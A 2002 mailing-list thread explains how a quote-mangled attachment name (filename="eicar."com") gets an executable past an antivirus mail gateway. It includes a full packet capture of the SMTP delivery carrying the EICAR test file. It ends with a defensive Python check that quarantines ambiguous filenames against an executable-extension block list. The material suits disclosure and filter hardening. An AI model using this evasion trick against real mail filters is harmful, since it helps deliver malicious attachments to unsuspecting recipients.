From: 3APA3A (3APA3A@SECURITY.NNOV.RU)
Date: Sun Feb 24 2002 - 05:09:30 CST
Dear Onie Camara,
The dump you sent exploits a vulnerability found by Aidan O'Kelly
<aidanokelly@oceanfree.net> (see section I.9 in
http://www.security.nnov.ru/advisories/content.asp ).
It uses filename="eicar."com" - older versions of Outlook Express and
Outlook convert this filename to "eicar.com", others to "eicar._com" -
that's why you failed.
--Saturday, February 23, 2002, 8:37:29 PM, you wrote to incidents@securityfocus.com:
OC> Hi guys,
OC> I don't know where to post actually.
OC> I am very interested in security and would like some of your help.
OC> I have found, I hope, a vulnerability in Trend Micro InterScan VirusWall.
OC> I have a setup of qmail and sqwebmail running on FreeBSD. When I send an
OC> email from sqwebmail containing the eicar test virus attachment, the
OC> attachment is bypassed by InterScan and is successfully delivered.
OC> I have escalated this to Trend Micro since the early week of January and
OC> until now, even with the latest pattern file, it is still bypassed.
OC> This is somewhat related to the Feb 18 post at
OC> http://www.securiteam.com/securitynews/5DP0I206AY.html
OC> Now, since I will be doing a pentest for another company, I would like some
OC> help on where I can download a Perl script that will send an exe/com
OC> attachment to a mail server but will bypass the filtering gateway.
OC> I have used this script, http://www.securiteam.com/exploits/5ZP0D2K6AY.html
OC> It works but the attachment's extension changes, e.g. eicar.com will become
OC> eicar._com.
OC> Here is a tcpdump:
OC> bash# tcpdump -x -X -s 14400 port not 22 and port not 53 and not arp and
OC> port not 68 and port not 67 and port not 80 and not igmp
OC> tcpdump: listening on xl0
OC> 11:23:45.478174 65.192.117.68.1760 > dhcp-74-1628.smtp: S
OC> 2796302688:2796302688(0) win 16384 <mss 1460,nop,nop,sackOK,nop,wscale
OC> 0,nop,nop,timestamp 546622090 0> (DF)
OC> 0x0000 4500 0040 66b1 4000 3406 1f70 41c0 7544 E..@f.@.4..pA.uD
OC> 0x0010 0cf8 fc9a 06e0 0019 a6ac 3160 0000 0000 ..........1`....
OC> 0x0020 b002 4000 6b45 0000 0204 05b4 0101 0402 ..@.kE..........
OC> 0x0030 0103 0300 0101 080a 2094 ca8a 0000 0000 ................
OC> 11:23:45.478679 dhcp-74-1628.smtp > 65.192.117.68.1760: S
OC> 1437153606:1437153606(0) ack 2796302689 win 33304 <mss 1460,nop,wscale
OC> 0,nop,nop,timestamp 908042 546622090> (DF)
OC> 0x0000 4500 003c 0f7c 4000 4006 6aa9 0cf8 fc9a E..<.|@.@.j.....
OC> 0x0010 41c0 7544 0019 06e0 55a9 3946 a6ac 3161 A.uD....U.9F..1a
OC> 0x0020 a012 8218 d41b 0000 0204 05b4 0103 0300 ................
OC> 0x0030 0101 080a 000d db0a 2094 ca8a ............
OC> 11:23:45.494674 65.192.117.68.1760 > dhcp-74-1628.smtp: . ack 1 win 17376
OC> <nop,nop,timestamp 546622090 908042> (DF)
OC> 0x0000 4500 0034 42c4 4000 3406 4369 41c0 7544 E..4B.@.4.CiA.uD
OC> 0x0010 0cf8 fc9a 06e0 0019 a6ac 3161 55a9 3947 ..........1aU.9G
OC> 0x0020 8010 43e0 3e18 0000 0101 080a 2094 ca8a ..C.>...........
OC> 0x0030 000d db0a ....
OC> 11:23:45.530047 dhcp-74-1628.smtp > 65.192.117.68.1760: P 1:43(42) ack 1 win
OC> 33304 <nop,nop,timestamp 908048 546622090> (DF)
OC> 0x0000 4500 005e 7e6d 4000 4006 fb95 0cf8 fc9a E..^~m@.@.......
OC> 0x0010 41c0 7544 0019 06e0 55a9 3947 a6ac 3161 A.uD....U.9G..1a
OC> 0x0020 8018 8218 e931 0000 0101 080a 000d db10 .....1..........
OC> 0x0030 2094 ca8a 3232 3020 7072 6f6d 6973 6375 ....220.promiscu
OC> 0x0040 6f75 732e 6479 6e64 6e73 2e6f 7267 2045 ous.dyndns.org.E
OC> 0x0050 534d 5450 2050 6f73 7466 6978 0d0a SMTP.Postfix..
OC> 11:23:45.553735 65.192.117.68.1760 > dhcp-74-1628.smtp: . ack 43 win 17376
OC> <nop,nop,timestamp 546622090 908048> (DF)
OC> 0x0000 4500 0034 2223 4000 3406 640a 41c0 7544 E..4"#@.4.d.A.uD
OC> 0x0010 0cf8 fc9a 06e0 0019 a6ac 3161 55a9 3971 ..........1aU.9q
OC> 0x0020 8010 43e0 3de8 0000 0101 080a 2094 ca8a ..C.=...........
OC> 0x0030 000d db10 ....
OC> 11:23:45.553933 65.192.117.68.1760 > dhcp-74-1628.smtp: P 1:33(32) ack 43
OC> win 17376 <nop,nop,timestamp 546622090 908048> (DF)
OC> 0x0000 4500 0054 5ac7 4000 3406 2b46 41c0 7544 E..TZ.@.4.+FA.uD
OC> 0x0010 0cf8 fc9a 06e0 0019 a6ac 3161 55a9 3971 ..........1aU.9q
OC> 0x0020 8018 43e0 85fe 0000 0101 080a 2094 ca8a ..C.............
OC> 0x0030 000d db10 4548 4c4f 2061 6e74 6973 7061 ....EHLO.antispa
OC> 0x0040 6d2e 7265 6d69 6e67 746f 6e6c 7464 2e63 m.remingtonltd.c
OC> 0x0050 6f6d 0d0a om..
OC> 11:23:45.554671 dhcp-74-1628.smtp > 65.192.117.68.1760: P 43:151(108) ack 33
OC> win 33304 <nop,nop,timestamp 908050 546622090> (DF)
OC> 0x0000 4500 00a0 b62a 4000 4006 c396 0cf8 fc9a E....*@.@.......
OC> 0x0010 41c0 7544 0019 06e0 55a9 3971 a6ac 3181 A.uD....U.9q..1.
OC> 0x0020 8018 8218 5f91 0000 0101 080a 000d db12 ...._...........
OC> 0x0030 2094 ca8a 3235 302d 7072 6f6d 6973 6375 ....250-promiscu
OC> 0x0040 6f75 732e 6479 6e64 6e73 2e6f 7267 0d0a ous.dyndns.org..
OC> 0x0050 3235 302d 5049 5045 4c49 4e49 4e47 0d0a 250-PIPELINING..
OC> 0x0060 3235 302d 5349 5a45 2032 3030 3030 3030 250-SIZE.2000000
OC> 0x0070 300d 0a32 3530 2d56 5246 590d 0a32 3530 0..250-VRFY..250
OC> 0x0080 2d45 5452 4e0d 0a32 3530 2d58 5645 5250 -ETRN..250-XVERP
OC> 0x0090 0d0a 3235 3020 3842 4954 4d49 4d45 0d0a ..250.8BITMIME..
OC> 11:23:45.571627 65.192.117.68.1760 > dhcp-74-1628.smtp: . ack 151 win 17268
OC> <nop,nop,timestamp 546622090 908050> (DF)
OC> 0x0000 4500 0034 0598 4000 3406 8095 41c0 7544 E..4..@.4...A.uD
OC> 0x0010 0cf8 fc9a 06e0 0019 a6ac 3181 55a9 39dd ..........1.U.9.
OC> 0x0020 8010 4374 3dc6 0000 0101 080a 2094 ca8a ..Ct=...........
OC> 0x0030 000d db12 ....
OC> 11:23:45.573727 65.192.117.68.1760 > dhcp-74-1628.smtp: P 33:101(68) ack 151
OC> win 17376 <nop,nop,timestamp 546622090 908050> (DF)
OC> 0x0000 4500 0078 01ee 4000 3406 83fb 41c0 7544 E..x..@.4...A.uD
OC> 0x0010 0cf8 fc9a 06e0 0019 a6ac 3181 55a9 39dd ..........1.U.9.
OC> 0x0020 8018 43e0 4202 0000 0101 080a 2094 ca8a ..C.B...........
OC> 0x0030 000d db12 4d41 494c 2046 524f 4d3a 3c3e ....MAIL.FROM:<>
OC> 0x0040 2053 495a 453d 3131 3139 0d0a 5243 5054 .SIZE=1119..RCPT
OC> 0x0050 2054 4f3a 3c6e 6569 6c40 7265 7374 7269 .TO:<neil@restri
OC> 0x0060 6374 6564 2e64 796e 646e 732e 6f72 673e cted.dyndns.org>
OC> 0x0070 0d0a 4441 5441 0d0a ..DATA..
OC> 11:23:45.580592 dhcp-74-1628.smtp > 65.192.117.68.1760: P 151:204(53) ack
OC> 101 win 33304 <nop,nop,timestamp 908053 546622090> (DF)
OC> 0x0000 4500 0069 6a03 4000 4006 0ff5 0cf8 fc9a E..ij.@.@.......
OC> 0x0010 41c0 7544 0019 06e0 55a9 39dd a6ac 31c5 A.uD....U.9...1.
OC> 0x0020 8018 8218 502b 0000 0101 080a 000d db15 ....P+..........
OC> 0x0030 2094 ca8a 3235 3020 4f6b 0d0a 3235 3020 ....250.Ok..250.
OC> 0x0040 4f6b 0d0a 3335 3420 456e 6420 6461 7461 Ok..354.End.data
OC> 0x0050 2077 6974 6820 3c43 523e 3c4c 463e 2e3c .with.<CR><LF>.<
OC> 0x0060 4352 3e3c 4c46 3e0d 0a CR><LF>..
OC> 11:23:45.607780 65.192.117.68.1760 > dhcp-74-1628.smtp: . ack 204 win 17323
OC> <nop,nop,timestamp 546622090 908053> (DF)
OC> 0x0000 4500 0034 2d7e 4000 3406 58af 41c0 7544 E..4-~@.4.X.A.uD
OC> 0x0010 0cf8 fc9a 06e0 0019 a6ac 31c5 55a9 3a12 ..........1.U.:.
OC> 0x0020 8010 43ab 3d13 0000 0101 080a 2094 ca8a ..C.=...........
OC> 0x0030 000d db15 ....
OC> 11:23:45.615561 65.192.117.68.1760 > dhcp-74-1628.smtp: P 101:1229(1128) ack
OC> 204 win 17376 <nop,nop,timestamp 546622090 908053> (DF)
OC> 0x0000 4500 049c 4e19 4000 3406 33ac 41c0 7544 E...N.@.4.3.A.uD
OC> 0x0010 0cf8 fc9a 06e0 0019 a6ac 31c5 55a9 3a12 ..........1.U.:.
OC> 0x0020 8018 43e0 715b 0000 0101 080a 2094 ca8a ..C.q[..........
OC> 0x0030 000d db15 5265 6365 6976 6564 3a20 6672 ....Received:.fr
OC> 0x0040 6f6d 2079 6f75 2028 6c6f 6361 6c68 6f73 om.you.(localhos
OC> 0x0050 7420 5b31 3237 2e30 2e30 2e31 5d29 0d0a t.[127.0.0.1])..
OC> 0x0060 0962 7920 616e 7469 7370 616d 2e72 656d .by.antispam.rem
OC> 0x0070 696e 6774 6f6e 6c74 642e 636f 6d20 2850 ingtonltd.com.(P
OC> 0x0080 6f73 7466 6978 2920 7769 7468 2053 4d54 ostfix).with.SMT
OC> 0x0090 5020 6964 2036 3730 4237 4538 4434 0d0a P.id.670B7E8D4..
OC> 0x00a0 0966 6f72 203c 6e65 696c 4072 6573 7472 .for.<neil@restr
OC> 0x00b0 6963 7465 642e 6479 6e64 6e73 2e6f 7267 icted.dyndns.org
OC> 0x00c0 3e3b 2053 6174 2c20 3233 2046 6562 2032 >;.Sat,.23.Feb.2
OC> 0x00d0 3030 3220 3131 3a31 363a 3137 202d 3036 002.11:16:17.-06
OC> 0x00e0 3030 2028 4353 5429 0d0a 4672 6f6d 3a20 00.(CST)..From:.
OC> 0x00f0 736f 6d65 4072 656d 696e 6774 6f6e 6c74 some@remingtonlt
OC> 0x0100 642e 636f 6d0d 0a54 6f3a 206e 6569 6c40 d.com..To:.neil@
OC> 0x0110 7265 7374 7269 6374 6564 2e64 796e 646e restricted.dyndn
OC> 0x0120 732e 6f72 670d 0a53 7562 6a65 6374 3a20 s.org..Subject:.
OC> 0x0130 7465 7374 0d0a 4d49 4d45 2d56 6572 7369 test..MIME-Versi
OC> 0x0140 6f6e 3a20 312e 300d 0a43 6f6e 7465 6e74 on:.1.0..Content
OC> 0x0150 2d54 7970 653a 206d 756c 7469 7061 7274 -Type:.multipart
OC> 0x0160 2f72 656c 6174 6564 3b0d 0a20 2020 2020 /related;.......
OC> 0x0170 2020 2074 7970 653d 226d 756c 7469 7061 ...type="multipa
OC> 0x0180 7274 2f61 6c74 6572 6e61 7469 7665 223b rt/alternative";
OC> 0x0190 0d0a 2020 2020 2020 2020 626f 756e 6461 ..........bounda
OC> 0x01a0 7279 3d22 4e65 7874 5061 7274 3139 220d ry="NextPart19".
OC> 0x01b0 0a4d 6573 7361 6765 2d49 643a 203c 3230 .Message-Id:.<20
OC> 0x01c0 3032 3032 3233 3137 3136 3137 2e36 3730 020223171617.670
OC> 0x01d0 4237 4538 4434 4061 6e74 6973 7061 6d2e B7E8D4@antispam.
OC> 0x01e0 7265 6d69 6e67 746f 6e6c 7464 2e63 6f6d remingtonltd.com
OC> 0x01f0 3e0d 0a44 6174 653a 2053 6174 2c20 3233 >..Date:.Sat,.23
OC> 0x0200 2046 6562 2032 3030 3220 3131 3a31 363a .Feb.2002.11:16:
OC> 0x0210 3137 202d 3036 3030 2028 4353 5429 0d0a 17.-0600.(CST)..
OC> 0x0220 0d0a 5468 6973 2069 7320 6120 6d75 6c74 ..This.is.a.mult
OC> 0x0230 692d 7061 7274 206d 6573 7361 6765 2069 i-part.message.i
OC> 0x0240 6e20 4d49 4d45 2066 6f72 6d61 742e 0d0a n.MIME.format...
OC> 0x0250 0d0a 2d2d 4e65 7874 5061 7274 3139 0d0a ..--NextPart19..
OC> 0x0260 436f 6e74 656e 742d 5479 7065 3a20 6d75 Content-Type:.mu
OC> 0x0270 6c74 6970 6172 742f 616c 7465 726e 6174 ltipart/alternat
OC> 0x0280 6976 653b 0d0a 2020 2020 2020 2020 626f ive;..........bo
OC> 0x0290 756e 6461 7279 3d22 4e65 7874 5061 7274 undary="NextPart
OC> 0x02a0 3230 220d 0a0d 0a2d 2d4e 6578 7450 6172 20"....--NextPar
OC> 0x02b0 7432 300d 0a43 6f6e 7465 6e74 2d54 7970 t20..Content-Typ
OC> 0x02c0 653a 2074 6578 742f 706c 6169 6e0d 0a43 e:.text/plain..C
OC> 0x02d0 6f6e 7465 6e74 2d54 7261 6e73 6665 722d ontent-Transfer-
OC> 0x02e0 456e 636f 6469 6e67 3a20 7175 6f74 6564 Encoding:.quoted
OC> 0x02f0 2d70 7269 6e74 6162 6c65 0d0a 0d0a 2d2d -printable....--
OC> 0x0300 4e65 7874 5061 7274 3230 0d0a 436f 6e74 NextPart20..Cont
OC> 0x0310 656e 742d 5479 7065 3a20 7465 7874 2f68 ent-Type:.text/h
OC> 0x0320 746d 6c3b 0d0a 2020 2020 2020 2020 6368 tml;..........ch
OC> 0x0330 6172 7365 743d 2269 736f 2d38 3835 392d arset="iso-8859-
OC> 0x0340 3122 0d0a 436f 6e74 656e 742d 5472 616e 1"..Content-Tran
OC> 0x0350 7366 6572 2d45 6e63 6f64 696e 673a 2071 sfer-Encoding:.q
OC> 0x0360 756f 7465 642d 7072 696e 7461 626c 650d uoted-printable.
OC> 0x0370 0a0d 0a74 6573 740d 0a2d 2d4e 6578 7450 ...test..--NextP
OC> 0x0380 6172 7432 302d 2d0d 0a0d 0a2d 2d4e 6578 art20--....--Nex
OC> 0x0390 7450 6172 7431 390d 0a43 6f6e 7465 6e74 tPart19..Content
OC> 0x03a0 2d54 7970 653a 2061 7070 6c69 6361 7469 -Type:.applicati
OC> 0x03b0 6f6e 2f78 2d6d 7364 6f77 6e6c 6f61 640d on/x-msdownload.
OC> 0x03c0 0a43 6f6e 7465 6e74 2d44 6973 706f 7369 .Content-Disposi
OC> 0x03d0 7469 6f6e 3a20 6174 7461 6368 6d65 6e74 tion:.attachment
OC> 0x03e0 3b66 696c 656e 616d 653d 2265 6963 6172 ;filename="eicar
OC> 0x03f0 2e22 636f 6d22 0d0a 436f 6e74 656e 742d ."com"..Content-
OC> 0x0400 5472 616e 7366 6572 2d45 6e63 6f64 696e Transfer-Encodin
OC> 0x0410 673a 2062 6173 6536 340d 0a0d 0a57 4456 g:.base64....WDV
OC> 0x0420 5049 5641 6c51 4546 5157 7a52 6355 4670 PIVAlQEFQWzRcUFp
OC> 0x0430 594e 5451 6f55 4634 704e 304e 444b 5464 YNTQoUF4pN0NDKTd
OC> 0x0440 394a 4556 4a51 3046 534c 564e 5551 5535 9JEVJQ0FSLVNUQU5
OC> 0x0450 4551 564a 454c 5546 4f56 456c 5753 564a EQVJELUFOVElWSVJ
OC> 0x0460 5655 7931 5552 564e 550d 0a4c 555a 4a54 VUy1URVNU..LUZJT
OC> 0x0470 4555 684a 4567 7253 436f 4e43 673d 3d0d EUhJEgrSCoNCg==.
OC> 0x0480 0a0d 0a2d 2d4e 6578 7450 6172 7431 392d ...--NextPart19-
OC> 0x0490 2d0d 0a2e 0d0a 5155 4954 0d0a -.....QUIT..
OC> 11:23:45.709692 dhcp-74-1628.smtp > 65.192.117.68.1760: . ack 1229 win 33304
OC> <nop,nop,timestamp 908066 546622090> (DF)
OC> 0x0000 4500 0034 cc50 4000 4006 addc 0cf8 fc9a E..4.P@.@.......
OC> 0x0010 41c0 7544 0019 06e0 55a9 3a12 a6ac 362d A.uD....U.:...6-
OC> 0x0020 8010 8218 fa30 0000 0101 080a 000d db22 .....0........."
OC> 0x0030 2094 ca8a ....
OC> 11:23:47.074647 dhcp-74-1628.smtp > 65.192.117.68.1760: P 204:243(39) ack
OC> 1229 win 33304 <nop,nop,timestamp 908202 546622090> (DF)
OC> 0x0000 4500 005b 9c6c 4000 4006 dd99 0cf8 fc9a E..[.l@.@.......
OC> 0x0010 41c0 7544 0019 06e0 55a9 3a12 a6ac 362d A.uD....U.:...6-
OC> 0x0020 8018 8218 00bc 0000 0101 080a 000d dbaa ................
OC> 0x0030 2094 ca8a 3235 3020 4f6b 3a20 7175 6575 ....250.Ok:.queu
OC> 0x0040 6564 2061 7320 3843 4237 3635 3334 3745 ed.as.8CB765347E
OC> 0x0050 0d0a 3232 3120 4279 650d 0a ..221.Bye..
OC> 11:23:47.074908 dhcp-74-1628.smtp > 65.192.117.68.1760: F 243:243(0) ack
OC> 1229 win 33304 <nop,nop,timestamp 908202 546622090> (DF)
OC> 0x0000 4500 0034 fa45 4000 4006 7fe7 0cf8 fc9a E..4.E@.@.......
OC> 0x0010 41c0 7544 0019 06e0 55a9 3a39 a6ac 362d A.uD....U.:9..6-
OC> 0x0020 8011 8218 f980 0000 0101 080a 000d dbaa ................
OC> 0x0030 2094 ca8a ....
OC> 11:23:47.091722 65.192.117.68.1760 > dhcp-74-1628.smtp: . ack 243 win 17376
OC> <nop,nop,timestamp 546622093 908202> (DF)
OC> 0x0000 4500 0034 4a13 4000 3406 3c1a 41c0 7544 E..4J.@.4.<.A.uD
OC> 0x0010 0cf8 fc9a 06e0 0019 a6ac 362d 55a9 3a39 ..........6-U.:9
OC> 0x0020 8010 43e0 37b7 0000 0101 080a 2094 ca8d ..C.7...........
OC> 0x0030 000d dbaa ....
OC> 11:23:47.092205 65.192.117.68.1760 > dhcp-74-1628.smtp: F 1229:1229(0) ack
OC> 243 win 17376 <nop,nop,timestamp 546622093 908202> (DF)
OC> 0x0000 4500 0034 4ca3 4000 3406 398a 41c0 7544 E..4L.@.4.9.A.uD
OC> 0x0010 0cf8 fc9a 06e0 0019 a6ac 362d 55a9 3a39 ..........6-U.:9
OC> 0x0020 8011 43e0 37b6 0000 0101 080a 2094 ca8d ..C.7...........
OC> 0x0030 000d dbaa ....
OC> 11:23:47.092519 dhcp-74-1628.smtp > 65.192.117.68.1760: F 243:243(0) ack
OC> 1230 win 33304 <nop,nop,timestamp 908204 546622093> (DF)
OC> 0x0000 4500 0034 f518 4000 4006 8514 0cf8 fc9a E..4..@.@.......
OC> 0x0010 41c0 7544 0019 06e0 55a9 3a39 a6ac 362e A.uD....U.:9..6.
OC> 0x0020 8011 8218 f97a 0000 0101 080a 000d dbac .....z..........
OC> 0x0030 2094 ca8d ....
OC> 11:23:47.097243 65.192.117.68.1760 > dhcp-74-1628.smtp: . ack 244 win 17376
OC> <nop,nop,timestamp 546622093 908202> (DF)
OC> 0x0000 4500 0034 5a93 4000 3406 2b9a 41c0 7544 E..4Z.@.4.+.A.uD
OC> 0x0010 0cf8 fc9a 06e0 0019 a6ac 362e 55a9 3a3a ..........6.U.::
OC> 0x0020 8010 43e0 37b5 0000 0101 080a 2094 ca8d ..C.7...........
OC> 0x0030 000d dbaa ....
OC> 11:23:47.109155 65.192.117.68.1760 > dhcp-74-1628.smtp: . ack 244 win 17376
OC> <nop,nop,timestamp 546622093 908204> (DF)
OC> 0x0000 4500 0034 3e09 4000 3406 4824 41c0 7544 E..4>.@.4.H$A.uD
OC> 0x0010 0cf8 fc9a 06e0 0019 a6ac 362e 55a9 3a3a ..........6.U.::
OC> 0x0020 8010 43e0 37b3 0000 0101 080a 2094 ca8d ..C.7...........
OC> 0x0030 000d dbac ....
OC> ^C
-- ~/ZARAZA Electric shocks are very useful for building character. (Lem)
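The point of 3APA3A's reply is a parser differential: the gateway and the mail client read the same Content-Disposition parameter, filename="eicar."com", and come away with different file names, so an extension-based filter sees a harmless name while the client saves something executable. The following Python is an added example, not code from this thread, from Trend Micro or from any of the clients named; it models the three readings the reply describes (a strict RFC 2045 quoted-string reader, a reader that drops every quote, and one that turns the inner quote into an underscore) and then shows the check a filtering gateway would want: evaluate the parameter under every plausible reading and quarantine when any reading yields a blocked extension or when the readings disagree. The BLOCKED_EXTENSIONS set, the function names and the sample header are assumptions made for the example; the header value is constructed to match the shape of the one in the capture, not copied from it.

```python
import re
from typing import NamedTuple

# Assumed block list for an executable-attachment filter (example policy only).
BLOCKED_EXTENSIONS = {"com", "exe", "bat", "pif", "scr", "vbs"}

# Constructed Content-Disposition value with an embedded double quote,
# shaped like the one the reply discusses.
SAMPLE_DISPOSITION = 'attachment;filename="eicar."com"'

# Only the plain filename= form is handled; RFC 2231 filename*= is out of scope here.
_FILENAME_RE = re.compile(r"filename\s*=\s*", re.IGNORECASE)


def _raw_filename_token(value: str) -> str:
    """Return the raw text after 'filename=' up to the next ';' or the end."""
    match = _FILENAME_RE.search(value)
    if not match:
        return ""
    return value[match.end():].split(";", 1)[0].strip()


def filename_strict(value: str) -> str:
    """RFC 2045 quoted-string reading: the name ends at the first unescaped
    double quote; whatever follows is ignored. Yields 'eicar.' for the sample."""
    token = _raw_filename_token(value)
    if not token.startswith('"'):
        return token
    out, i = [], 1
    while i < len(token):
        ch = token[i]
        if ch == "\\" and i + 1 < len(token):   # quoted-pair: keep next char literally
            out.append(token[i + 1])
            i += 2
            continue
        if ch == '"':                           # closing quote ends the string
            break
        out.append(ch)
        i += 1
    return "".join(out)


def filename_lenient(value: str) -> str:
    """Drop every double quote in the token, the behaviour the reply attributes
    to older Outlook / Outlook Express. Yields 'eicar.com' for the sample."""
    return _raw_filename_token(value).replace('"', "")


def filename_underscore(value: str) -> str:
    """Strip the outer quotes and turn any inner quote into '_', the behaviour
    the reply attributes to other clients. Yields 'eicar._com' for the sample."""
    token = _raw_filename_token(value)
    if len(token) >= 2 and token[0] == '"' and token[-1] == '"':
        token = token[1:-1]
    return token.replace('"', "_")


def extension(name: str) -> str:
    """Lower-cased text after the last dot, or '' if there is none."""
    return name.rsplit(".", 1)[1].lower() if "." in name else ""


class Verdict(NamedTuple):
    interpretations: dict
    quarantine: bool
    reason: str


def gateway_verdict(value: str) -> Verdict:
    """Gateway-side check: judge the attachment by every reading a downstream
    client might apply, not just the one the gateway's own parser happens to use."""
    interps = {
        "strict": filename_strict(value),
        "lenient": filename_lenient(value),
        "underscore": filename_underscore(value),
    }
    exts = {extension(n) for n in interps.values()}
    blocked = exts & BLOCKED_EXTENSIONS
    if blocked:
        return Verdict(interps, True, f"blocked extension under some reading: {sorted(blocked)}")
    if len(exts) > 1:
        return Verdict(interps, True, "ambiguous filename: readings disagree on extension")
    return Verdict(interps, False, "consistent, allowed extension")


if __name__ == "__main__":
    for header in (SAMPLE_DISPOSITION, 'attachment; filename="report.pdf"'):
        v = gateway_verdict(header)
        print(header, "->", v.interpretations, "quarantine" if v.quarantine else "pass", v.reason)
```

The lesson for a filter author is in gateway_verdict: a single parse of an attacker-controlled parameter is not a safe basis for an allow decision, because the client that finally saves the file may read it differently. Rejecting or renaming any parameter that contains a stray quote character, as the strict reader reveals, is a simpler alternative to enumerating client behaviours.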